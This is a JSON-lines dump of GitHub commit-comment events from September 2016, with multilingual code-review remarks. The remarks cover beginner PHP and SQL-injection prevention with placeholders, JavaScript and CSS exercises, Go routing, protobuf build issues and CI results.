{"id":"4612105614","type":"CommitCommentEvent","actor":{"login":"yoshiyoshifujii"},"repo":{"name":"yoshiyoshifujii/sbt-aws-serverless.g8"},"payload":{"comment":{"id":19157049,"position":1,"line":1,"path":"src/main/g8/LICENSE","commit_id":"7590e35a174eea7db18bf045b69e2955f218d988","created_at":"2016-09-24T07:13:10Z","updated_at":"2016-09-24T07:13:10Z","body":"Oh..."}},"created_at":"2016-09-24T07:13:10Z"}
{"id":"4612105961","type":"CommitCommentEvent","actor":{"login":"phucthai123"},"repo":{"name":"phucthai1234/bai1"},"payload":{"comment":{"id":19157050,"position":null,"line":null,"path":null,"commit_id":"8f6d2f7f39adc02e0d8fe3e68eb344176a889c45","created_at":"2016-09-24T07:13:29Z","updated_at":"2016-09-24T07:13:29Z","body":"123"}},"created_at":"2016-09-24T07:13:29Z"}
{"id":"4612108369","type":"CommitCommentEvent","actor":{"login":"EwaPerzanowska"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19157060,"position":18,"line":38,"path":"gruntfile.js","commit_id":"747d607d9fed3fd62fd9b2e1c48459d523352db6","created_at":"2016-09-24T07:15:40Z","updated_at":"2016-09-24T07:15:40Z","body":"dzięki, zmieniłam, działa, fajne to :) oprócz wpisania, że ma się zajmować plikami css, zmieniłam też ten fragment: server: {\r\n                    baseDir: \"./\"\r\n            }\r\nale szczerze mówiąc odgapiłam to z dokumentacji i nie do końca rozumiem co to oznacza, \r\n\r\nprzy okazji: mam problemy z obiektywnie prostą, ale dla mnie jako dla laika jeszcze dość nową kwestią :), czyli ze wskazywaniem plików, zbiorów plików, folderów etc. - chodzi mi np o coś takiego - *.{png,jpg,gif} albo  app/css/*.css - jak widzę, to już z grubsza wiem o co chodzi, ale sama nie umiem jeszcze za bardzo tego napisać - jest gdzieś może jakaś ściąga gdzie by kompleksowo było opisane jak to robić? "}},"created_at":"2016-09-24T07:15:40Z"}
{"id":"4612108968","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19157063,"position":114,"line":237,"path":"components/pedigree/ui/src/main/resources/PhenoTips/UIX_Field__pedigree.xml","commit_id":"d3c458c5bf71bb66cbc0047fe4f54442b705aa8a","created_at":"2016-09-24T07:16:14Z","updated_at":"2016-09-24T07:16:14Z","body":"You can actually put other text inside the quotes, like:\r\n\r\n    \"${services.localization.render('phenotips.patientRecord.pedigree.deleteWarning')}&lt;br&gt;&lt;br&gt;\" +\r\n    \"${services.localization.render('phenotips.patientRecord.pedigree.deleteFamilyWarning')} \" + familyString + \". \""}},"created_at":"2016-09-24T07:16:14Z"}
{"id":"4612109964","type":"CommitCommentEvent","actor":{"login":"SammysHP"},"repo":{"name":"lukeIam/cgeo"},"payload":{"comment":{"id":19157065,"position":null,"line":null,"path":null,"commit_id":"60e32b74bd702eb4a258912ba67ef74a04e01ae2","created_at":"2016-09-24T07:17:07Z","updated_at":"2016-09-24T07:17:07Z","body":"Most of the time you won't need navigation. But the router is always initialized. Would be better if this is done when the user starts navigation."}},"created_at":"2016-09-24T07:17:07Z"}
{"id":"4612110236","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19157068,"position":null,"line":null,"path":null,"commit_id":"a3ac07dae5b74a576cc17a142a1949c94a8edc6b","created_at":"2016-09-24T07:17:22Z","updated_at":"2016-09-24T07:17:22Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [As a product Owner I want an Admin Dashboard for Mkonnect's customer service, it should be user friendly](https://trello.com/c/GQGfWQYa/29-as-a-product-owner-i-want-an-admin-dashboard-for-mkonnect-s-customer-service-it-should-be-user-friendly)"}},"created_at":"2016-09-24T07:17:22Z"}
{"id":"4612110318","type":"CommitCommentEvent","actor":{"login":"deltabet"},"repo":{"name":"go-web-framework/mux"},"payload":{"comment":{"id":19157069,"position":null,"line":null,"path":null,"commit_id":"cbc9ddedc402d9ad2029a1faa40fc2e20ebc329c","created_at":"2016-09-24T07:17:26Z","updated_at":"2016-09-24T07:17:26Z","body":"I attempted to integrate our radix tree implementation with the mux. I am not completely sure how the context package works so we will likely choose a different implementation, but the structure for recognizing variables in urls should be correct.\r\n\r\nThe code currently does not work, since for some reason the context go file on my system won't compile; the compiler complains about an undefined reference to the Comparable function. I added the include in the context.go file, which created many other undefined reference errors in the go directory. I would like to see if this problem occurs with anybody else's Go files before I continue."}},"created_at":"2016-09-24T07:17:26Z"}
{"id":"4612110466","type":"CommitCommentEvent","actor":{"login":"soulcreate"},"repo":{"name":"soulcreate/helpers-css"},"payload":{"comment":{"id":19157071,"position":null,"line":null,"path":null,"commit_id":"80d006820ac2b1d340380c9deacdf993acae6d33","created_at":"2016-09-24T07:17:33Z","updated_at":"2016-09-24T07:17:33Z","body":"Add display: table, table-cell, table-row and block"}},"created_at":"2016-09-24T07:17:33Z"}
{"id":"4612111070","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19157075,"position":null,"line":null,"path":null,"commit_id":"0b04d4022d46df0e5383ae063681d72985c16da6","created_at":"2016-09-24T07:18:01Z","updated_at":"2016-09-24T07:18:01Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [create database Mkonnect- Tables: Jobs,Interviewskills and cv writing with all their respective fields](https://trello.com/c/Ab2TrtdG/25-create-database-mkonnect-tables-jobs-interviewskills-and-cv-writing-with-all-their-respective-fields)"}},"created_at":"2016-09-24T07:18:01Z"}
{"id":"4612121224","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157087,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-24T07:26:59Z","updated_at":"2016-09-24T07:26:59Z","body":"ここで言っている 「SQLインジェクション対策で書いてみる 」というのは「プレースホルダを使う」ということになります。\r\n\r\n「プレースホルダを使う」ということに関しては、\r\n\r\nhttps://github.com/hdfukuoka1985/phptrainning/commit/118c90c3a194e7d67bbac0ab761828654b5d5a4a#commitcomment-19156978\r\n\r\nのコメントを参照して調べてみてください。\r\n\r\n### プレースホルダの種類について\r\n\r\n今は特に違いを気にする必要はないのですが(書き方がほぼ一緒なので)\r\nプレースホルダには、静的プレースホルダと動的プレースホルダというものがあります。\r\n\r\nこの静的か動的かの違いはざっくりいいますと\r\nプレースホルダでやりたいこと(SQLインジェクション対策)が\r\n\r\n- 静的 = データベース管理システム(MySQL側)で機能する\r\n- 動的 = PHP側で機能する\r\n\r\nという違いになります。\r\nそして、静的の方がより安全だと言われております(ふーんそうなんだぐらいの理解で大丈夫です)。\r\n\r\n\r\n### 静的プレースホルダと動的プレースホルダのPHPでの書き方の違い\r\n\r\n基本的には一緒です(!!!<strong>この部分が今抜けています</strong>!!!)。\r\n\r\n一緒ではない部分\r\n\r\n今福岡さんが書かれた\r\n\r\n`$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);`\r\n\r\nでこの書き方で静的プレースホルダを使うことになり、書かないと動的プレースホルダを使うことになります。\r\n\r\n### さらに、簡単な覚え方\r\n\r\nこのプレースホルダという機能は元々データベース管理システムの機能としてあったのではないかと思います。\r\n`PDO::ATTR_EMULATE_PREPARES` の `EMULATE` は日本語にすると「真似る」で、データベース管理システムの(プレースホルダの)機能をPHP側で模倣して作ったのではないかと思います。\r\nそして`PDO::ATTR_EMULATE_PREPARES`はデフォルトで`true`です。これを`false`にするとPHP側のプレースホルダ機能がオフになって元々あったデータベース管理システム側の機能が使われるわけです。"}},"created_at":"2016-09-24T07:26:59Z"}
{"id":"4612121252","type":"CommitCommentEvent","actor":{"login":"seva0812"},"repo":{"name":"seva0812/best-auth-vk"},"payload":{"comment":{"id":19157088,"position":null,"line":null,"path":null,"commit_id":"480b708906e37c1d39772220c7ec1b2fd36c530b","created_at":"2016-09-24T07:27:01Z","updated_at":"2016-09-24T07:27:01Z","body":"rerere"}},"created_at":"2016-09-24T07:27:01Z"}
{"id":"4612121891","type":"CommitCommentEvent","actor":{"login":"gauravsars"},"repo":{"name":"gauravsars/HTMLCSSExamples"},"payload":{"comment":{"id":19157089,"position":null,"line":null,"path":null,"commit_id":"e1654c7adc9cdc30a89688c4a52c4b55aef8d2c8","created_at":"2016-09-24T07:27:33Z","updated_at":"2016-09-24T07:27:33Z","body":"replacing div circle with image contained in div as bydefault both were not alligned in same section.\r\nalso\r\nusing  margin:0 auto to position the image in the center.  "}},"created_at":"2016-09-24T07:27:33Z"}
{"id":"4612122093","type":"CommitCommentEvent","actor":{"login":"fungilation"},"repo":{"name":"alinz/react-native-webview-bridge"},"payload":{"comment":{"id":19157090,"position":null,"line":null,"path":null,"commit_id":"030c1c5a3d847f514b01a32f00b801cb23416f8e","created_at":"2016-09-24T07:27:45Z","updated_at":"2016-09-24T07:27:45Z","body":"Tested this. with keyboardDisplayRequiresUserAction set to true, injected JS in webview doing a htmlElement.focus() still isn't bringing the keyboard up."}},"created_at":"2016-09-24T07:27:45Z"}
{"id":"4612122690","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19157091,"position":null,"line":null,"path":null,"commit_id":"d6fed8bc8ddac8cae0f76a2877ef43dd78482f88","created_at":"2016-09-24T07:28:18Z","updated_at":"2016-09-24T07:28:18Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [In-Game Collision-box Editor](https://trello.com/c/HQBF1SBM/86-in-game-collision-box-editor)"}},"created_at":"2016-09-24T07:28:18Z"}
{"id":"4612122708","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157092,"position":49,"line":70,"path":"issue11-2/result.php","commit_id":"98653b5f4240ada32931bc738e2d440f2151dfa5","created_at":"2016-09-24T07:28:20Z","updated_at":"2016-09-24T07:28:20Z","body":"この書き方いいですね！"}},"created_at":"2016-09-24T07:28:20Z"}
{"id":"4612123925","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157095,"position":52,"line":73,"path":"issue11-2/result.php","commit_id":"98653b5f4240ada32931bc738e2d440f2151dfa5","created_at":"2016-09-24T07:29:29Z","updated_at":"2016-09-24T07:29:29Z","body":"```\r\nif($rec==false)\r\n{ break;}\r\n```\r\nこの部分いらないかもしれません。"}},"created_at":"2016-09-24T07:29:29Z"}
{"id":"4612125841","type":"CommitCommentEvent","actor":{"login":"maarten-k"},"repo":{"name":"ebiggers/libdeflate"},"payload":{"comment":{"id":19157098,"position":null,"line":null,"path":null,"commit_id":"64dc75786d12cc4df005de50add12e36503f579a","created_at":"2016-09-24T07:31:22Z","updated_at":"2016-09-24T07:31:22Z","body":"Thanks! it works!"}},"created_at":"2016-09-24T07:31:22Z"}
{"id":"4612126953","type":"CommitCommentEvent","actor":{"login":"Viswanath11"},"repo":{"name":"Viswanath11/imad-2016-app"},"payload":{"comment":{"id":19157100,"position":4,"line":13,"path":"ui/index.html","commit_id":"a1f1fc5b2f19773ce6f265c7455ecb631d56819e","created_at":"2016-09-24T07:32:32Z","updated_at":"2016-09-24T07:32:32Z","body":"1st Change"}},"created_at":"2016-09-24T07:32:32Z"}
{"id":"4612127286","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157101,"position":62,"line":75,"path":"issue11-2/result.php","commit_id":"98653b5f4240ada32931bc738e2d440f2151dfa5","created_at":"2016-09-24T07:32:50Z","updated_at":"2016-09-24T07:32:50Z","body":"とても良くなりましたね！\r\n理想はPHPで「動的に出力したい部分だけ」をPHPタグで囲む書き方なので、\r\n\r\n例えば\r\n```\r\n<p><?php echo 'ID：'.$rec['id'];?>/ ......\r\n```\r\nの部分は\r\n```\r\n<p>ID：<?php echo $rec['id'];?>/ ......\r\n```\r\nこういう形のほうが良いかと思います。"}},"created_at":"2016-09-24T07:32:50Z"}
{"id":"4612131374","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157109,"position":44,"line":41,"path":"issue18/login.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-24T07:36:37Z","updated_at":"2016-09-24T07:36:37Z","body":"ここ一旦イコールで書いてみましょうか！\r\n```\r\nif ($password1 == $password2)\r\n```"}},"created_at":"2016-09-24T07:36:37Z"}
{"id":"4612132174","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157112,"position":21,"line":31,"path":"issue18/login.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-24T07:37:21Z","updated_at":"2016-09-24T07:37:21Z","body":"この書き方ですと、もしnameに該当する人が複数人いた場合、パスワードが一致しないかも？"}},"created_at":"2016-09-24T07:37:21Z"}
{"id":"4612132281","type":"CommitCommentEvent","actor":{"login":"monibu1548"},"repo":{"name":"All-door/Artik_internal_controller"},"payload":{"comment":{"id":19157113,"position":4,"line":4,"path":"sensor.py","commit_id":"d9aabe97e80e9d834a2f8cf3b6728483b5057fb6","created_at":"2016-09-24T07:37:26Z","updated_at":"2016-09-24T07:37:26Z","body":"Sensor \r\n대문자로 바꿔주세여"}},"created_at":"2016-09-24T07:37:26Z"}
{"id":"4612132579","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19157115,"position":null,"line":null,"path":null,"commit_id":"222ee920199edfc1ffad9e39e09bdcacb90fac78","created_at":"2016-09-24T07:37:42Z","updated_at":"2016-09-24T07:37:42Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-24T07:37:42Z"}
{"id":"4612132625","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157116,"position":20,"line":30,"path":"issue18/login.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-24T07:37:46Z","updated_at":"2016-09-24T07:37:46Z","body":"この書き方ですと、もしnameに該当する人が複数人いた場合、パスワードが一致しないかも？"}},"created_at":"2016-09-24T07:37:46Z"}
{"id":"4612133304","type":"CommitCommentEvent","actor":{"login":"herrjemand"},"repo":{"name":"Netflix/security_monkey"},"payload":{"comment":{"id":19157118,"position":84,"line":84,"path":"security_monkey/auth/modules.py","commit_id":"0863c49f4c25c00176671a65c3e7e379a30aa62d","created_at":"2016-09-24T07:38:24Z","updated_at":"2016-09-24T07:38:24Z","body":"@ollytheninja You mean\r\n\r\n```\r\napp = Flask(__name__)\r\nrbac = RBAC(app)\r\n```\r\nand\r\n```\r\napp = Flask(__name__)\r\nrbac = RBAC()\r\nrbac.init_app(app)\r\n```\r\n"}},"created_at":"2016-09-24T07:38:24Z"}
{"id":"4612134759","type":"CommitCommentEvent","actor":{"login":"monibu1548"},"repo":{"name":"All-door/Artik_internal_controller"},"payload":{"comment":{"id":19157120,"position":null,"line":null,"path":null,"commit_id":"d9aabe97e80e9d834a2f8cf3b6728483b5057fb6","created_at":"2016-09-24T07:39:49Z","updated_at":"2016-09-24T07:39:49Z","body":"exit_gpio 함수 밑으로 그냥 Sensor클래스내에\r\n\r\n온습도 구하는게 바로 있는데\r\n이걸\r\ndef getTemperature\r\ndef getHumidity \r\n함수로 구분해주세여"}},"created_at":"2016-09-24T07:39:49Z"}
{"id":"4612136430","type":"CommitCommentEvent","actor":{"login":"meeeA"},"repo":{"name":"cloudliner/booklog"},"payload":{"comment":{"id":19157122,"position":null,"line":null,"path":null,"commit_id":"49b139d057f4dfce94dadb9ad968cceb6f7e82cc","created_at":"2016-09-24T07:41:21Z","updated_at":"2016-09-24T07:41:21Z","body":"検索結果ページ（仮）を作成しました。\r\nまだ、Topとの遷移のところは作れていません。"}},"created_at":"2016-09-24T07:41:21Z"}
{"id":"4612137735","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157126,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-24T07:42:35Z","updated_at":"2016-09-24T07:42:35Z","body":"こちら、ご指摘ありがとうございます！ようやく意味が理解できたように思います。\r\n下記のような形であっておりますでしょうか？\r\n\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18806920/c55afba4-8275-11e6-8a76-dbde4ae6257b.png)\r\n"}},"created_at":"2016-09-24T07:42:35Z"}
{"id":"4612139236","type":"CommitCommentEvent","actor":{"login":"EwaPerzanowska"},"repo":{"name":"EwaPerzanowska/zadanie-8.6-"},"payload":{"comment":{"id":19157128,"position":21,"line":21,"path":"js/scripts.js","commit_id":"681a51bed88394f9849972dc3b4240abae9719e1","created_at":"2016-09-24T07:44:02Z","updated_at":"2016-09-24T07:44:02Z","body":"poprawiłam zamykając kod w else, mógłbyś mi wyjaśnić dokładniej jak można zrobić to z return w ifach? "}},"created_at":"2016-09-24T07:44:02Z"}
{"id":"4612140384","type":"CommitCommentEvent","actor":{"login":"maheshkshirsagar"},"repo":{"name":"maheshkshirsagar/hello"},"payload":{"comment":{"id":19157129,"position":1,"line":1,"path":"README.md","commit_id":"9e5b2a7728b2d88a58190571ab477d4b3fd1c916","created_at":"2016-09-24T07:45:07Z","updated_at":"2016-09-24T07:45:07Z","body":"mahesh kshirsagar\r\ndiploma in computer engineering\r\nBachelor in computer engg\r\nMaster in business # **_Administration(Marketing)_**"}},"created_at":"2016-09-24T07:45:07Z"}
{"id":"4612140500","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157130,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-24T07:45:13Z","updated_at":"2016-09-24T07:45:13Z","body":"お、おしいです！\r\n\r\n:id を使うのはあっています。\r\n\r\nあとはbindParamを使います。\r\nissue18/regist.phpのコメントのようにです。"}},"created_at":"2016-09-24T07:45:13Z"}
{"id":"4612141345","type":"CommitCommentEvent","actor":{"login":"EwaPerzanowska"},"repo":{"name":"EwaPerzanowska/zadanie-8.6-"},"payload":{"comment":{"id":19157132,"position":29,"line":29,"path":"js/scripts.js","commit_id":"681a51bed88394f9849972dc3b4240abae9719e1","created_at":"2016-09-24T07:46:05Z","updated_at":"2016-09-24T07:46:05Z","body":"rzeczywiście, tak prościej"}},"created_at":"2016-09-24T07:46:05Z"}
{"id":"4612141626","type":"CommitCommentEvent","actor":{"login":"subways"},"repo":{"name":"piotr-szachewicz/iir-filter-designer"},"payload":{"comment":{"id":19157133,"position":null,"line":null,"path":null,"commit_id":"06722c1089b8dd525fb44330afc6dfa33a0d1c62","created_at":"2016-09-24T07:46:21Z","updated_at":"2016-09-24T07:46:21Z","body":"thanks for your code. I want to know if there miss math file?I'm not sure,I'm a newcomer to java."}},"created_at":"2016-09-24T07:46:21Z"}
{"id":"4612145555","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19157139,"position":44,"line":236,"path":"mandelbulber2/src/command_line_interface.cpp","commit_id":"0c921cc79d8e751ccb07b47dd35fe53a14cae291","created_at":"2016-09-24T07:50:05Z","updated_at":"2016-09-24T07:50:05Z","body":"hmm, thats right.\r\nBut this\r\n```nohup mandelbulber2 -q > /tmp/queue.log 2>&1 &```\r\nprobably also works on BSD / Solaris / OSX / Linux (I dont see a reason why not).\r\n\r\nso better *unix-like*?"}},"created_at":"2016-09-24T07:50:05Z"}
{"id":"4612145709","type":"CommitCommentEvent","actor":{"login":"andreasabel"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19157140,"position":6,"line":137,"path":"src/full/Agda/Interaction/BasicOps.hs","commit_id":"157e274146fbe1c03886d252bf3ad83e2dbeca13","created_at":"2016-09-24T07:50:12Z","updated_at":"2016-09-24T07:50:12Z","body":"Ah, indeed, essential blooper.\r\n"}},"created_at":"2016-09-24T07:50:12Z"}
{"id":"4612147450","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157145,"position":20,"line":30,"path":"issue18/login.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-24T07:51:52Z","updated_at":"2016-09-24T07:51:52Z","body":"ごめんなさい、ユニークにしろと言ったのは私でしたね; この書き方であっています。"}},"created_at":"2016-09-24T07:51:52Z"}
{"id":"4612148664","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157149,"position":13,"line":13,"path":"issue18/regist.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-24T07:53:00Z","updated_at":"2016-09-24T07:53:00Z","body":"ここいらないかも？"}},"created_at":"2016-09-24T07:53:00Z"}
{"id":"4612149717","type":"CommitCommentEvent","actor":{"login":"gauravsars"},"repo":{"name":"gauravsars/HTMLCSSExamples"},"payload":{"comment":{"id":19157154,"position":null,"line":null,"path":null,"commit_id":"e1654c7adc9cdc30a89688c4a52c4b55aef8d2c8","created_at":"2016-09-24T07:53:53Z","updated_at":"2016-09-24T07:53:53Z","body":"coding convention:\r\n\r\n    <!-- Give space of single line between the child tags -->\r\n    <!--Give no space between the intermediate siblings -->\r\n\r\n`<html>\r\n\r\n<head>\r\n</head\r\n\r\n<body>\r\n\r\n<child-tag1>\r\n\r\n<child-tag2>\r\n</child-tag2>\r\n\r\n</child-tag1>\r\n\r\n</body>\r\n\r\n</html>\r\n`"}},"created_at":"2016-09-24T07:53:53Z"}
{"id":"4612150055","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157155,"position":31,"line":31,"path":"issue18/regist.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-24T07:54:12Z","updated_at":"2016-09-24T07:54:12Z","body":"この部分復活すると登録できますでしょうか。"}},"created_at":"2016-09-24T07:54:12Z"}
{"id":"4612150443","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157159,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-24T07:54:34Z","updated_at":"2016-09-24T07:54:34Z","body":"なんと汗\r\n下記のような形でしょうか？\r\n\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18807001/873b0db2-8277-11e6-8a7d-932cc0b9706c.png)\r\n"}},"created_at":"2016-09-24T07:54:34Z"}
{"id":"4612150746","type":"CommitCommentEvent","actor":{"login":"awalterschulze"},"repo":{"name":"gogo/protobuf"},"payload":{"comment":{"id":19157160,"position":null,"line":null,"path":null,"commit_id":"08dc052e9af8ac508edec335d01020a54d0989a9","created_at":"2016-09-24T07:54:51Z","updated_at":"2016-09-24T07:54:51Z","body":"Ha ha yes please :) \r\nI emailed with someone who could.\r\nWhy this was breaking for him makes sense to me.\r\nBut why this is working on my mac and travis does not.\r\n\r\nBasically proto3.proto was importing google/protobuf/any.proto which was not in the proto_path.\r\n../protobuf points to github.com/gogo/protobuf/protobuf which contains google/protobuf/any.proto\r\n\r\nI have first thought this was because of different protoc versions.\r\nAnd I was using 3.0.0 and they were using 3.0.2\r\nThen I upgraded to 3.0.2 and still could not reproduce the error.\r\n\r\nIts quite sad.\r\nMaybe it has something to do with the way protoc is installed, but currently I don't know.\r\n"}},"created_at":"2016-09-24T07:54:51Z"}
{"id":"4612151505","type":"CommitCommentEvent","actor":{"login":"EwaPerzanowska"},"repo":{"name":"EwaPerzanowska/zadanie-8.5"},"payload":{"comment":{"id":19157162,"position":12,"line":12,"path":"js/scripts.js","commit_id":"429dde2de8c9cc613a8390d0a4ce003f97a09752","created_at":"2016-09-24T07:55:33Z","updated_at":"2016-09-24T07:55:33Z","body":"Sama nie zauważyłam, ale o chyba o tym  właśnie było w module: \r\n\r\n\"Dlaczego więc używamy funkcji push()?\r\n\r\nJest ona bardziej przystosowana do dokładania danych do naszej tablicy, a co za tym idzie znacznie szybsza w działaniu.\r\n\r\nDodatkowo jako wynik działania zwraca długość tablicy.\r\n\r\nvar test = ['a', 'b', 'c'];\r\nvar x = test.push('d');\r\nTablica będzie wyglądała tak samo jak w poprzednim przykładzie, lecz dodatkowo zmienna x będzie miała wartość 4, czyli nową długość tablicy test.\"\r\n\r\nNie za bardzo zrozumiałam o co w tym fragmencie chodzi i miałam cię o to spytać na rozmowie - ale w takim razie spytam teraz: o co chodzi? :)"}},"created_at":"2016-09-24T07:55:33Z"}
{"id":"4612151593","type":"CommitCommentEvent","actor":{"login":"defstat"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19157164,"position":22,"line":94,"path":"QuickSubmitPlugin.inc.php","commit_id":"9338ccfd9cda95683ce37d1b9c1e64df9f39d0f5","created_at":"2016-09-24T07:55:40Z","updated_at":"2016-09-24T07:55:40Z","body":"@asmecher I should have realized that earlier.  Changed the AjaxFormHandler to FormHandler.. Still learning. Thanks Alec. "}},"created_at":"2016-09-24T07:55:40Z"}
{"id":"4612152037","type":"CommitCommentEvent","actor":{"login":"cguedes"},"repo":{"name":"urbancups/node-sheets"},"payload":{"comment":{"id":19157165,"position":31,"line":131,"path":"src/sheets.js","commit_id":"96498c273ff854f3b282e31051281cb0eb1ef740","created_at":"2016-09-24T07:56:06Z","updated_at":"2016-09-24T07:56:06Z","body":"Agree. I will change the method to be `.tables(rangeArray|range)`."}},"created_at":"2016-09-24T07:56:06Z"}
{"id":"4612154926","type":"CommitCommentEvent","actor":{"login":"glensc"},"repo":{"name":"eventum/eventum"},"payload":{"comment":{"id":19157175,"position":12,"line":50,"path":"templates/include/dropzone.tpl.html","commit_id":"1a7873d1c884ab31285afc9c881b5225033a0abe","created_at":"2016-09-24T07:58:58Z","updated_at":"2016-09-24T07:58:58Z","body":"do you intend to keep this debug?"}},"created_at":"2016-09-24T07:58:58Z"}
{"id":"4612155432","type":"CommitCommentEvent","actor":{"login":"ZuoCaiSong"},"repo":{"name":"ltebean/LTNavigationBar"},"payload":{"comment":{"id":19157178,"position":null,"line":null,"path":null,"commit_id":"5db4c033ab89b174d58640fe4fcfacfd689f8201","created_at":"2016-09-24T07:59:28Z","updated_at":"2016-09-24T07:59:28Z","body":"ios10有一个新的问题，当你从首页点击cell push到一个新的界面之后，再pop回到首页，首页的title 和左右按钮就会随着导航栏颜色的加深，而逐渐消失，这个问题是怎么回事呢。10.0之前貌似不会出现"}},"created_at":"2016-09-24T07:59:28Z"}
{"id":"4612155849","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157181,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-24T07:59:48Z","updated_at":"2016-09-24T07:59:48Z","body":"あと、下記の箇所はこのように書き換えたほうが宜しいでしょうか？\r\nこのような形式でSQL文を書くことをプリペアドステートメントを使う、という認識でよろしいでしょうか？\r\n\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18807036/31f87e42-8278-11e6-98b7-7dfa1af724f6.png)\r\n"}},"created_at":"2016-09-24T07:59:48Z"}
{"id":"4612155980","type":"CommitCommentEvent","actor":{"login":"Izidor"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19157182,"position":130,"line":1913,"path":"src/server/game/Entities/Player/Player.cpp","commit_id":"55d2c19f079e9486c1c1f939c61501f53ac42159","created_at":"2016-09-24T07:59:55Z","updated_at":"2016-09-24T07:59:55Z","body":"You forgot to re-implement rate ;)"}},"created_at":"2016-09-24T07:59:55Z"}
